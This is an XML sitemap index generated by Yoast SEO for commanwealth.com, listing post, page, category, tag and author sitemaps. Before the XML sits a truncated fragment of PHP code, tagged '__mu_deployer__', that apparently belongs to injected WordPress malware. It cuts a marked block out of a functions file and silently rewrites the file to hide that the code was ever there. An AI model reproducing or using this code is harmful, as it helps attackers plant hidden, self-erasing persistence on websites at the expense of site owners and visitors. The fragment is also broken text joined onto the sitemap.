';
    $s = strpos($fc, $m);
    $e = strrpos($fc, $m);
    if ($s !== false && $e !== false && $s !== $e) {
      $clean = rtrim(substr($fc, 0, $s) . substr($fc, $e + strlen($m))) . "\n";
      if (strlen($clean) > 10 && strpos($clean, '<?php') !== false) {
        $tmp = $func_file . '.tmp.' . getmypid();
        if (@file_put_contents($tmp, $clean) === strlen($clean)) {
          @rename($tmp, $func_file);
        } else {
          @unlink($tmp);
        }
      }
    }
  }
}, 1);
/* __mu_deployer__ */
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//commanwealth.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://commanwealth.com/post-sitemap.xml</loc>
		<lastmod>2025-11-30T05:53:39+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://commanwealth.com/page-sitemap.xml</loc>
		<lastmod>2025-12-13T06:29:14+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://commanwealth.com/category-sitemap.xml</loc>
		<lastmod>2025-11-30T05:53:39+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://commanwealth.com/post_tag-sitemap.xml</loc>
		<lastmod>2015-01-24T12:27:19+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://commanwealth.com/author-sitemap.xml</loc>
		<lastmod>2025-11-30T08:17:49+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->